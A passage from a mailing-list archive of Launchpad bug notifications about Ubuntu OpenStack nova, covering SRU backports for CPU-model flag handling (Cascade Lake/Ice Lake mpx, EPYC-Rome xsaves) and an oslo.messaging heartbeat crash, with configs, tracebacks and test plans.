https://wiki.ubuntu.com/Testing/EnableProposed for documentation on how to enable and use -proposed. Your feedback will aid us getting this update out to other Ubuntu users. If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, what testing has been performed on the package and change the tag from verification-needed- jammy to verification-done-jammy. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification- failed-jammy. In either case, without details of your testing we will not be able to proceed. Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance for helping! N.B. The updated package will be released to -updates after the bug(s) fixed by this package have been verified and the package has been in -proposed for a minimum of 7 days. ** Changed in: nova (Ubuntu Jammy) Status: In Progress => Fix Committed ** Tags added: verification-needed verification-needed-jammy ** Changed in: nova (Ubuntu Focal) Status: In Progress => Fix Committed ** Tags added: verification-needed-focal -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to nova in Ubuntu. https://bugs.launchpad.net/bugs/1999814 Title: [SRU] Allow for specifying common baseline CPU model with disabled feature Status in OpenStack Compute (nova): Expired Status in OpenStack Compute (nova) ussuri series: New Status in OpenStack Compute (nova) victoria series: Won't Fix Status in OpenStack Compute (nova) wallaby series: Won't Fix Status in OpenStack Compute (nova) xena series: Won't Fix Status in OpenStack Compute (nova) yoga series: New Status in nova package in Ubuntu: Fix Released Status in nova source package in Bionic: Won't Fix Status in nova source package in Focal: Fix Committed Status in nova source package in Jammy: Fix Committed Bug description: ******** SRU TEMPLATE AT THE BOTTOM ******* Hello, This is very similar to pad.lv/1852437 (and the related blueprint at https://blueprints.launchpad.net/nova/+spec/allow-disabling-cpu- flags), but there is a very different and important nuance. A customer I'm working with has two classes of blades that they're trying to use. Their existing ones are Cascade Lake-based; they are presently using the Cascadelake-Server-noTSX CPU model via libvirt.cpu_model in nova.conf. Their new blades are Ice Lake-based, which is a newer processor, which typically would also be able to run based on the Cascade Lake feature set - except that these Ice Lake processors lack the MPX feature defined in the Cascadelake-Server- noTSX model. The result of this is evident when I try to start nova on the new blades with the Ice Lake CPUs. Even if I specify the following in my nova.conf: [libvirt] cpu_mode = custom cpu_model = Cascadelake-Server-noTSX cpu_model_extra_flags = -mpx That is not enough to allow Nova to start; it fails in the libvirt driver in the _check_cpu_compatibility function: 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Traceback (most recent call last): 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service File "/usr/lib/python3/dist-packages/nova/virt/libvirt/driver.py", line 771, in _check_cpu_compatibility 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service self._compare_cpu(cpu, self._get_cpu_info(), None) 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service File "/usr/lib/python3/dist-packages/nova/virt/libvirt/driver.py", line 8817, in _compare_cpu 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service raise exception.InvalidCPUInfo(reason=m % {'ret': ret, 'u': u}) 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service nova.exception.InvalidCPUInfo: Unacceptable CPU info: CPU doesn't have compatibility. 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 0 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Refer to http://libvirt.org/html/libvirt-libvirt-host.html#virCPUCompareResult 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service During handling of the above exception, another exception occurred: 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Traceback (most recent call last): 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service File "/usr/lib/python3/dist-packages/oslo_service/service.py", line 810, in run_service 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service service.start() 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service File "/usr/lib/python3/dist-packages/nova/service.py", line 173, in start 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service self.manager.init_host() 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service File "/usr/lib/python3/dist-packages/nova/compute/manager.py", line 1404, in init_host 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service self.driver.init_host(host=self.host) 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service File "/usr/lib/python3/dist-packages/nova/virt/libvirt/driver.py", line 743, in init_host 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service self._check_cpu_compatibility() 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service File "/usr/lib/python3/dist-packages/nova/virt/libvirt/driver.py", line 777, in _check_cpu_compatibility 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service raise exception.InvalidCPUInfo(msg) 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service nova.exception.InvalidCPUInfo: Configured CPU model: Cascadelake-Server-noTSX is not compatible with host CPU. Please correct your config and try again. Unacceptable CPU info: CPU doesn't have compatibility. 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 0 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Refer to http://libvirt.org/html/libvirt-libvirt-host.html#virCPUCompareResult 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service If I make a custom libvirt CPU map file which removes the "" feature and specify that as the cpu_model instead, I am able to make Nova start - so it does indeed seem to specifically be that single feature which is blocking me. However, editing the libvirt CPU mapping files is probably not the right way to fix this - hence why I'm filing this bug, for discussion of how to support cases like this. Currently the only "proper" way I'm aware of to work around this right now is to fall back to a Broadwell-based configuration which lacks the "mpx" feature to use as a common baseline, but that's a much older configuration than Cascade Lake and would mean missing out on all the other features which are common in both Cascade Lake and Ice Lake. I would rather if there were a way to use the Cascade Lake settings but simply remove that "mpx" feature from use. ---- Steps to reproduce ================== On an Ice Lake system lacking the MPX feature (e.g. /proc/cpuinfo reporting model of "Intel(R) Xeon(R) Gold 5318Y"), specify the following settings in nova.conf in libvirt settings: [libvirt] cpu_mode = custom cpu_model = Cascadelake-Server-noTSX cpu_model_extra_flags = -mpx Then try to start nova. Expected result =============== Nova should start since Cascadelake-Server-noTSX is a subset of Icelake-Server-noTSX, thus allowing the use of Cascadelake-Server- noTSX as a common baseline model for both Cascade Lake and Ice Lake servers. Actual result ============= Nova refuses to start, claiming the specified CPU model is incompatible. The "cpu_model_extra_flags = -mpx" config option does not help. Environment =========== Nova/OpenStack version: OpenStack Ussuri running on Ubuntu Focal. Specifically, nova packages are at version 2:21.2.4-0ubuntu2. Hypervisor: libvirt + KVM Other relevant notes ==================== There are some other open related bugs. The removal of the MPX feature in some Ice Lake processors has manifested in other ways as well. These bugs are primarily in regards to the missing MPX feature breaking how Ice Lake processors are detected, so the nuance is somewhat different - however, they may be worth reviewing as well. * https://gitlab.com/libvirt/libvirt/-/issues/304: bug regarding the Icelake CPU maps in libvirt not working to detect certain Ice Lakes, instead detecting them as Broadwell-noTSX-IBRS according to "virsh capabilities" due to lacking the MPX feature. (I've personally tested that removing the mpx feature from the associated CPU mapping files allows for detecting as Ice Lake, but that's not the correct way to fix this.) There is also an interesting comment on this bug at https://gitlab.com/libvirt/libvirt/-/issues/304#note_1065798706. It basically implies that rather than looking at "virsh capabilities", "virsh domcapabilities" should be used instead as it seems to more correctly identify the CPU model even if there are disabled flags like MPX. * https://bugs.launchpad.net/ubuntu/+source/libvirt/+bug/1978064: Launchpad-side bug regarding the above issue as encountered in Ubuntu. =============== SRU Description =============== [Impact] When using IceLake CPUs alongside CascadeLake CPUs, the Nova code does not start due to comparing CPU models. It fails before even comparing the flags. Unfortunately, IceLake CPUs are detected as having compatibility with Broadwell, not CascadeLake. Using Broadwell as a common denominator disables many modern features. The Libvirt upstream team will not add specific support to IceLake [1]. The fix [2] in Nova is to ignore CPU check (as a configurable workaround) as let libvirt handle the added/removed flags, which is assumed to work for this specific case. [Test case] Due to not having Icelake and Cascadelake CPUs in our usual lab for testing of this specific scenario, the test case for this could be either: 1) run for this SRU is running the charmed-openstack-tester [1] against the environment containing the upgraded package (essentially as it would be in a point release SRU) and expect the test to pass. Test run evidence will be attached to LP. 2) manually deploy nova and the necessary openstack services to get Nova to the code point of validating the issue in a single node. I already achieved this and was able to test the fix by hacking the node code to bypass the need of other services (conductor, keystone, mysql, etc) but for a proper validation a clean installation (without any hackery) is considered mandatory. In such case, the test case would be: a) Deploy nova and required services in an IceLake machine b) Make sure the nova.conf has: cpu_mode = custom cpu_models = Cascadelake-Server-noTSX cpu_model_extra_flags = -mpx c) Check /var/log/nova/nova-compute.log for a successful nova-compute service boot. It will not start properly without the fix, therefore presenting the error: 2024-07-08 15:08:48.378 8399 CRITICAL nova [-] Unhandled error: nova.exception.InvalidCPUInfo: Configured CPU model: Cascadelake- Server-noTSX is not compatible with host CPU. Please correct your config and try again. Unacceptable CPU info: CPU doesn't have compatibility. d) Install package containing the fix and confirm the successful nova- compute service restart, not containing the error and containing this instead: 2024-07-09 19:41:31.806 243487 DEBUG nova.virt.libvirt.driver [-] cpu compare xml: Cascadelake-Server-noTSX [Regression Potential] There is 1 new behavior introduced and 1 changed. The behavior introduced is gated by a new config option that needs to be enabled, and when enabled, it skips running the code. The behavior changed is the one assumed by the default disabled value of the config option. The fact that the code being backported in Yoga-Ussuri is exactly the same as in currently Master (Caracal+), it means that no issues have been found with the code across 4 releases, giving some confidence that the code changed is unlikely to cause issues. [Other Info] [1] https://bugs.launchpad.net/ubuntu/+source/libvirt/+bug/1978064 [2] https://review.opendev.org/c/openstack/nova/+/871969 To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1999814/+subscriptions From 1999814 at bugs.launchpad.net Thu Aug 1 20:14:46 2024 From: 1999814 at bugs.launchpad.net (Andreas Hasenack) Date: Thu, 01 Aug 2024 20:14:46 -0000 Subject: [Bug 1999814] Please test proposed package References: <167112824615.38411.17486317442666564453.malonedeb@angus.canonical.com> Message-ID: <172254328614.1313926.13760160277923427554.malone@juju-98d295-prod-launchpad-7> Hello Paul, or anyone else affected, Accepted nova into focal-proposed. The package will build now and be available at https://launchpad.net/ubuntu/+source/nova/2:21.2.4-0ubuntu2.12 in a few hours, and then in the -proposed repository. Please help us by testing this new package. See https://wiki.ubuntu.com/Testing/EnableProposed for documentation on how to enable and use -proposed. Your feedback will aid us getting this update out to other Ubuntu users. If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, what testing has been performed on the package and change the tag from verification-needed- focal to verification-done-focal. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification- failed-focal. In either case, without details of your testing we will not be able to proceed. Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance for helping! N.B. The updated package will be released to -updates after the bug(s) fixed by this package have been verified and the package has been in -proposed for a minimum of 7 days. -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to nova in Ubuntu. https://bugs.launchpad.net/bugs/1999814 Title: [SRU] Allow for specifying common baseline CPU model with disabled feature Status in OpenStack Compute (nova): Expired Status in OpenStack Compute (nova) ussuri series: New Status in OpenStack Compute (nova) victoria series: Won't Fix Status in OpenStack Compute (nova) wallaby series: Won't Fix Status in OpenStack Compute (nova) xena series: Won't Fix Status in OpenStack Compute (nova) yoga series: New Status in nova package in Ubuntu: Fix Released Status in nova source package in Bionic: Won't Fix Status in nova source package in Focal: Fix Committed Status in nova source package in Jammy: Fix Committed Bug description: ******** SRU TEMPLATE AT THE BOTTOM ******* Hello, This is very similar to pad.lv/1852437 (and the related blueprint at https://blueprints.launchpad.net/nova/+spec/allow-disabling-cpu- flags), but there is a very different and important nuance. A customer I'm working with has two classes of blades that they're trying to use. Their existing ones are Cascade Lake-based; they are presently using the Cascadelake-Server-noTSX CPU model via libvirt.cpu_model in nova.conf. Their new blades are Ice Lake-based, which is a newer processor, which typically would also be able to run based on the Cascade Lake feature set - except that these Ice Lake processors lack the MPX feature defined in the Cascadelake-Server- noTSX model. The result of this is evident when I try to start nova on the new blades with the Ice Lake CPUs. Even if I specify the following in my nova.conf: [libvirt] cpu_mode = custom cpu_model = Cascadelake-Server-noTSX cpu_model_extra_flags = -mpx That is not enough to allow Nova to start; it fails in the libvirt driver in the _check_cpu_compatibility function: 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Traceback (most recent call last): 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service File "/usr/lib/python3/dist-packages/nova/virt/libvirt/driver.py", line 771, in _check_cpu_compatibility 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service self._compare_cpu(cpu, self._get_cpu_info(), None) 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service File "/usr/lib/python3/dist-packages/nova/virt/libvirt/driver.py", line 8817, in _compare_cpu 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service raise exception.InvalidCPUInfo(reason=m % {'ret': ret, 'u': u}) 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service nova.exception.InvalidCPUInfo: Unacceptable CPU info: CPU doesn't have compatibility. 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 0 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Refer to http://libvirt.org/html/libvirt-libvirt-host.html#virCPUCompareResult 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service During handling of the above exception, another exception occurred: 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Traceback (most recent call last): 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service File "/usr/lib/python3/dist-packages/oslo_service/service.py", line 810, in run_service 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service service.start() 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service File "/usr/lib/python3/dist-packages/nova/service.py", line 173, in start 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service self.manager.init_host() 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service File "/usr/lib/python3/dist-packages/nova/compute/manager.py", line 1404, in init_host 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service self.driver.init_host(host=self.host) 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service File "/usr/lib/python3/dist-packages/nova/virt/libvirt/driver.py", line 743, in init_host 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service self._check_cpu_compatibility() 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service File "/usr/lib/python3/dist-packages/nova/virt/libvirt/driver.py", line 777, in _check_cpu_compatibility 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service raise exception.InvalidCPUInfo(msg) 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service nova.exception.InvalidCPUInfo: Configured CPU model: Cascadelake-Server-noTSX is not compatible with host CPU. Please correct your config and try again. Unacceptable CPU info: CPU doesn't have compatibility. 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 0 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Refer to http://libvirt.org/html/libvirt-libvirt-host.html#virCPUCompareResult 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service If I make a custom libvirt CPU map file which removes the "" feature and specify that as the cpu_model instead, I am able to make Nova start - so it does indeed seem to specifically be that single feature which is blocking me. However, editing the libvirt CPU mapping files is probably not the right way to fix this - hence why I'm filing this bug, for discussion of how to support cases like this. Currently the only "proper" way I'm aware of to work around this right now is to fall back to a Broadwell-based configuration which lacks the "mpx" feature to use as a common baseline, but that's a much older configuration than Cascade Lake and would mean missing out on all the other features which are common in both Cascade Lake and Ice Lake. I would rather if there were a way to use the Cascade Lake settings but simply remove that "mpx" feature from use. ---- Steps to reproduce ================== On an Ice Lake system lacking the MPX feature (e.g. /proc/cpuinfo reporting model of "Intel(R) Xeon(R) Gold 5318Y"), specify the following settings in nova.conf in libvirt settings: [libvirt] cpu_mode = custom cpu_model = Cascadelake-Server-noTSX cpu_model_extra_flags = -mpx Then try to start nova. Expected result =============== Nova should start since Cascadelake-Server-noTSX is a subset of Icelake-Server-noTSX, thus allowing the use of Cascadelake-Server- noTSX as a common baseline model for both Cascade Lake and Ice Lake servers. Actual result ============= Nova refuses to start, claiming the specified CPU model is incompatible. The "cpu_model_extra_flags = -mpx" config option does not help. Environment =========== Nova/OpenStack version: OpenStack Ussuri running on Ubuntu Focal. Specifically, nova packages are at version 2:21.2.4-0ubuntu2. Hypervisor: libvirt + KVM Other relevant notes ==================== There are some other open related bugs. The removal of the MPX feature in some Ice Lake processors has manifested in other ways as well. These bugs are primarily in regards to the missing MPX feature breaking how Ice Lake processors are detected, so the nuance is somewhat different - however, they may be worth reviewing as well. * https://gitlab.com/libvirt/libvirt/-/issues/304: bug regarding the Icelake CPU maps in libvirt not working to detect certain Ice Lakes, instead detecting them as Broadwell-noTSX-IBRS according to "virsh capabilities" due to lacking the MPX feature. (I've personally tested that removing the mpx feature from the associated CPU mapping files allows for detecting as Ice Lake, but that's not the correct way to fix this.) There is also an interesting comment on this bug at https://gitlab.com/libvirt/libvirt/-/issues/304#note_1065798706. It basically implies that rather than looking at "virsh capabilities", "virsh domcapabilities" should be used instead as it seems to more correctly identify the CPU model even if there are disabled flags like MPX. * https://bugs.launchpad.net/ubuntu/+source/libvirt/+bug/1978064: Launchpad-side bug regarding the above issue as encountered in Ubuntu. =============== SRU Description =============== [Impact] When using IceLake CPUs alongside CascadeLake CPUs, the Nova code does not start due to comparing CPU models. It fails before even comparing the flags. Unfortunately, IceLake CPUs are detected as having compatibility with Broadwell, not CascadeLake. Using Broadwell as a common denominator disables many modern features. The Libvirt upstream team will not add specific support to IceLake [1]. The fix [2] in Nova is to ignore CPU check (as a configurable workaround) as let libvirt handle the added/removed flags, which is assumed to work for this specific case. [Test case] Due to not having Icelake and Cascadelake CPUs in our usual lab for testing of this specific scenario, the test case for this could be either: 1) run for this SRU is running the charmed-openstack-tester [1] against the environment containing the upgraded package (essentially as it would be in a point release SRU) and expect the test to pass. Test run evidence will be attached to LP. 2) manually deploy nova and the necessary openstack services to get Nova to the code point of validating the issue in a single node. I already achieved this and was able to test the fix by hacking the node code to bypass the need of other services (conductor, keystone, mysql, etc) but for a proper validation a clean installation (without any hackery) is considered mandatory. In such case, the test case would be: a) Deploy nova and required services in an IceLake machine b) Make sure the nova.conf has: cpu_mode = custom cpu_models = Cascadelake-Server-noTSX cpu_model_extra_flags = -mpx c) Check /var/log/nova/nova-compute.log for a successful nova-compute service boot. It will not start properly without the fix, therefore presenting the error: 2024-07-08 15:08:48.378 8399 CRITICAL nova [-] Unhandled error: nova.exception.InvalidCPUInfo: Configured CPU model: Cascadelake- Server-noTSX is not compatible with host CPU. Please correct your config and try again. Unacceptable CPU info: CPU doesn't have compatibility. d) Install package containing the fix and confirm the successful nova- compute service restart, not containing the error and containing this instead: 2024-07-09 19:41:31.806 243487 DEBUG nova.virt.libvirt.driver [-] cpu compare xml: Cascadelake-Server-noTSX [Regression Potential] There is 1 new behavior introduced and 1 changed. The behavior introduced is gated by a new config option that needs to be enabled, and when enabled, it skips running the code. The behavior changed is the one assumed by the default disabled value of the config option. The fact that the code being backported in Yoga-Ussuri is exactly the same as in currently Master (Caracal+), it means that no issues have been found with the code across 4 releases, giving some confidence that the code changed is unlikely to cause issues. [Other Info] [1] https://bugs.launchpad.net/ubuntu/+source/libvirt/+bug/1978064 [2] https://review.opendev.org/c/openstack/nova/+/871969 To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1999814/+subscriptions From 2048517 at bugs.launchpad.net Thu Aug 1 20:15:54 2024 From: 2048517 at bugs.launchpad.net (Andreas Hasenack) Date: Thu, 01 Aug 2024 20:15:54 -0000 Subject: [Bug 2048517] Re: EPYC-Rome model without XSAVES may break live migration since the removal of the flag on the physical CPU References: <170470935000.2322881.14682222740716386457.malonedeb@juju-98d295-prod-launchpad-4> Message-ID: <172254335409.1315743.15589704572824582906.malone@juju-98d295-prod-launchpad-7> Hello Jan, or anyone else affected, Accepted nova into focal-proposed. The package will build now and be available at https://launchpad.net/ubuntu/+source/nova/2:21.2.4-0ubuntu2.12 in a few hours, and then in the -proposed repository. Please help us by testing this new package. See https://wiki.ubuntu.com/Testing/EnableProposed for documentation on how to enable and use -proposed. Your feedback will aid us getting this update out to other Ubuntu users. If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, what testing has been performed on the package and change the tag from verification-needed- focal to verification-done-focal. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification- failed-focal. In either case, without details of your testing we will not be able to proceed. Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance for helping! N.B. The updated package will be released to -updates after the bug(s) fixed by this package have been verified and the package has been in -proposed for a minimum of 7 days. ** Changed in: nova (Ubuntu Focal) Status: In Progress => Fix Committed ** Tags added: verification-needed verification-needed-focal -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to nova in Ubuntu. https://bugs.launchpad.net/bugs/2048517 Title: EPYC-Rome model without XSAVES may break live migration since the removal of the flag on the physical CPU Status in nova package in Ubuntu: Fix Released Status in qemu package in Ubuntu: Invalid Status in nova source package in Focal: Fix Committed Status in qemu source package in Focal: Invalid Bug description: [ Impact ] * Live migration is increasingly being impacted by changes to CPU flags (e.g., 'xsaves' disabled on AMD EPYC; PKRU/'xsave' behavior changes), which prevents migration on otherwise identical hypervisors, but the only difference is a CPU flag (i.e., source hypervisor still has flag enabled; destination hypervisor had flag disabled on a kernel update). * These CPU flags updates require changes to CPU model definitions in several places (qemu, libvirt, and nova if openstack is being used), which is a lot of overhead for each subtle variation that may appear. * Fortunately, it's possible to reduce the changes required by allowing nova to customize CPU flags to enable/disable _on top_ of a CPU model definition (e.g., the same AMD EPYC CPU model with 'xsaves' disabled). * This change is present in Jammy and later, and is backward compatible with the existing config files, as the (new) enable/disable operators are an optional prefix to existing flags (e.g., '-xsaves' or '+xsaves'). [ Test Plan ] * Deploy Openstack with 2 hypervisors (or more), and configure nova.conf with a cpu_model and cpu_extra_flags to disable/enable, for example: # grep cpu_model /etc/nova/nova.conf cpu_model = EPYC-Rome cpu_model_extra_flags = -xsaves * Start a VM before/after the package upgrade (focal-proposed), checking the VM XML for that flag (e.g., policy change from require to disable); for example: Before: # virsh dumpxml instance- | grep xsaves After: # virsh dumpxml instance- | grep xsaves * Ensure that nova is able to start *with* and *without* enable/disable cpu flag changes. * Ensure live migration works on both ways across the 2 hypervisors *with* and *without* enable/disable cpu flag changes. [ Regression Potential ] * Regressions would likely manifest in the areas modified by the patches, i.e., parsing the config file's cpu flags (on nova startup), generating a VM's XML file (on nova VM start/creation), and also live migration. * The patched packages have been evaluated/running in production for 2-3 months now, and live migration have been performed, without any issues. [ Other Info ] * The code changes had their callee-paths reviewed, and potential issues were not identified. * The patches are already present in Jammy and later. [ Original Bug Description ] The linux kernel upstream disabled XSAVES on AMD EPYC Rome CPUs ([1]). Upstream qemu shortly followed with a patch adding a CPU model version of EPYC-Rome without XSAVES ([2]) The change in the kernel has been backported to ubuntu focal ([3]). Without further workarounds or the adapted CPU model in qemu this will lead to a situation were virtual machines with an EPYC-Rome CPU model created on hypervisors with newer EPYC CPUs will have the XSAVES flag enabled, thus preventing live migration to hypervisors with EPYC Rome CPUs were XSAVES is no longer available. Therefore I would like to argue that the patch adapting the CPU model in qemu should also be backported to ubuntu focal. [1] https://lore.kernel.org/all/20230307174643.1240184-1-andrew.cooper3 at citrix.com/ [2] https://patchew.org/QEMU/20230524213748.8918-1-davydov-max at yandex-team.ru/ [3] https://bugs.launchpad.net/ubuntu/+source/linux/+bug/2023420 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/nova/+bug/2048517/+subscriptions From 1934937 at bugs.launchpad.net Thu Aug 1 20:35:00 2024 From: 1934937 at bugs.launchpad.net (Andreas Hasenack) Date: Thu, 01 Aug 2024 20:35:00 -0000 Subject: [Bug 1934937] Re: Heartbeat in pthreads in nova-wallaby crashes with greenlet error References: <162569043200.32143.8233415883389284315.malonedeb@wampee.canonical.com> Message-ID: <172254450149.889962.6080134065394584068.launchpad@juju-98d295-prod-launchpad-2> ** Also affects: python-oslo.messaging (Ubuntu) Importance: Undecided Status: New ** Changed in: python-oslo.messaging (Ubuntu) Status: New => Fix Released ** Changed in: python-oslo.messaging (Ubuntu Jammy) Status: New => In Progress -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to Ubuntu Cloud Archive. https://bugs.launchpad.net/bugs/1934937 Title: Heartbeat in pthreads in nova-wallaby crashes with greenlet error Status in Ubuntu Cloud Archive: Invalid Status in Ubuntu Cloud Archive yoga series: Triaged Status in oslo.messaging: Fix Released Status in nova package in Ubuntu: Invalid Status in python-oslo.messaging package in Ubuntu: Fix Released Status in nova source package in Jammy: Triaged Status in python-oslo.messaging source package in Jammy: In Progress Bug description: When performing a heartbeat to rabbit (inside a nova-compute process), there is a greenlet error which causes a hard crash. I'm not exactly sure what details are relevant, but can provide more info if there's something that will be useful! This is on RHEL7 (essentially... somewhat custom image based on it) Log snippet: ``` 2021-07-07 19:34:52,686 DEBUG [oslo.messaging._drivers.impl_rabbit] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/oslo_messaging/_drivers/impl_rabbit.py:__init__:608 [279fc413-9d7c-4fad-89e8-8de308658947] Connecting to AMQP server on 127.0.0.1:5671 2021-07-07 19:34:52,699 DEBUG [amqp.connection.Connection.heartbeat_tick] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/amqp/connection.py:heartbeat_tick:726 heartbeat_tick : for connection 79f7cf4331b34cb0a2e3608281076773 2021-07-07 19:34:52,699 DEBUG [amqp.connection.Connection.heartbeat_tick] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/amqp/connection.py:heartbeat_tick:740 heartbeat_tick : Prev sent/recv: None/None, now - 6/6, monotonic - 9634.717472491, last_heartbeat_sent - 9634.717470288, heartbeat int. - 60 for connection 79f7cf4331b34cb0a2e3608281076773 2021-07-07 19:34:52,700 DEBUG [amqp.connection.Connection.heartbeat_tick] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/amqp/connection.py:heartbeat_tick:726 heartbeat_tick : for connection 79f7cf4331b34cb0a2e3608281076773 2021-07-07 19:34:52,701 DEBUG [amqp.connection.Connection.heartbeat_tick] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/amqp/connection.py:heartbeat_tick:740 heartbeat_tick : Prev sent/recv: 6/6, now - 6/6, monotonic - 9634.719438155, last_heartbeat_sent - 9634.717470288, heartbeat int. - 60 for connection 79f7cf4331b34cb0a2e3608281076773 2021-07-07 19:34:52,718 DEBUG [amqp] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/amqp/connection.py:_on_start:382 Start from server, version: 0.9, properties: {'capabilities': {'publisher_confirms': True, 'exchange_exchange_bindings': True, 'basic.nack': True, 'consumer_cancel_notify': True, 'connection.blocked': True, 'consumer_priorities': True, 'authentication_failure_close': True, 'per_consumer_qos': True, 'direct_reply_to': True}, 'cluster_name': 'rabbit_5672 at fedb460a.openstack', 'copyright': 'Copyright (c) 2007-2020 VMware, Inc. or its affiliates.', 'information': 'Licensed under the MPL 1.1. Website: https://rabbitmq.com', 'platform': 'Erlang/OTP 23.0.2', 'product': 'RabbitMQ', 'version': '3.8.5'}, mechanisms: [b'PLAIN', b'AMQPLAIN', b'EXTERNAL'], locales: ['en_US'] 2021-07-07 19:34:52,719 DEBUG [amqp] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/amqp/channel.py:__init__:104 using channel_id: 1 2021-07-07 19:34:52,720 DEBUG [amqp] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/amqp/channel.py:_on_open_ok:444 Channel open 2021-07-07 19:34:52,721 DEBUG [amqp.connection.Connection.heartbeat_tick] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/amqp/connection.py:heartbeat_tick:726 heartbeat_tick : for connection c0299792d20e42a2b0a17d037d7d3058 Traceback (most recent call last): File "/opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/eventlet/hubs/hub.py", line 476, in fire_timers timer() File "/opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/eventlet/hubs/timer.py", line 59, in __call__ cb(*args, **kw) File "/opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/eventlet/semaphore.py", line 152, in _do_acquire waiter.switch() greenlet.error: cannot switch to a different thread ``` Versions: ``` oslo.messaging==12.7.1 nova==23.0.2 (packaged locally from stable/wallaby as of July 3, 2021) ``` ------------------------------------------------------------------------------- [Impact] The Nova default value of heartbeat_in_pthread needs to be False for non-wsgi services otherwise they crash when attempting to send a heartbeat message e.g. in a greenthread like nova-compute. This backports the patch to Jammy/Yoga in Ubuntu. [Test Plan] * Deploy Openstack Yoga on Jammy and ensure nova-compute has debug=True * ensure "oslo_messaging_rabbit.heartbeat_in_pthread = False" by checking latest entry in /var/log/nova/nova-compute.log * By default a heartbeat is checked 2 times every 60 seconds * Check /var/log/nova/nova-compute.log and ensure that do not see any "greenlet.error: cannot switch to a different thread" errors [Regression Potential] Changing the default to False will mean that while services not running under wsgi will be fixed, services that are running under wsgi will revert back to using their native threading method i.e. greenthreads which is considered 